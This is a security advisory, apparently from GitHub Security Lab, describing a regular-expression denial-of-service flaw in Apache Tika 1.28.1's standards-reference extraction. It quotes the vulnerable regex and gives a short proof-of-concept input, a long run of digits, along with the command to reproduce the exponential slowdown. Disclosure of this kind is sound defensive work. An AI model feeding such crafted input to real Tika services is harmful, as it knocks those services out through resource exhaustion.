Coordinated Disclosure Timeline

Summary

Apache Tika up to version 1.28.1 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles standard references in text files. Specially crafted files may cause catastrophic backtracking, taking exponential time to complete.

Product

Apache Tika

Tested Version

1.28.1

Details

Issue: Regular Expression Denial of Service (ReDoS) in StandardsText.java. (GHSL-2022-021)

Apache Tika uses the following regular expression to match uppercase standard headers when extracting standard references from a text file using StandardsText:

private static final String REGEX_HEADER =
        "(\\d+\\.(\\d+\\.?)*)\\p{Blank}+([A-Z]+(\\s[A-Z]+)*){5,}";

Note the nested repetition at (\\d+\\.?)*. The regex engine would need to exponentially backtrack [1] in order to distinguish which part of the expression (either \\d+, or the * after the parentheses, since \\. is optional) matches an input containing a long sequence of numbers, in case there is not a full match after it.

This regex is used in StandardsText.findHeaders, which in turn is called in StandardsText.extractStandardReferences. The latter is used by the StandardsExtractingContentHandler class, which means that a text file being parsed using this handler and containing a specific payload may exploit the ReDoS vulnerability.

To demonstrate the exploitation, the provided StandardsExtractionExample can be used as follows:

$ cat /tmp/test/test.txt
2.9999999999999999999999999999999

$ cd tika-examples

$ mvn compile exec:java -Dexec.mainClass="org.apache.tika.example.StandardsExtractionExample" -Dexec.args="/tmp/test"

The time needed to parse the file grows exponentially with the length of the sequence of 9s in the input file test.txt.

Note that JDK 9 introduced important mitigations for this problem, so in order to reproduce the issue with the above example, it must be run with JDK =< 8.

Impact

This issue may lead to a denial of service by resource consumption.

Resources

[1] https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS [2] https://github.com/google/re2j

CVE

Credit

This issue was discovered and reported by the CodeQL team members @atorralba (Tony Torralba) and @joefarebrother (Joseph Farebrother).
The incomplete fix was discovered and reported by the CodeQL team member @atorralba (Tony Torralba) and @jarlob (Jaroslav Lobačevski) from Github Security Lab.

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-021 in any communication regarding this issue.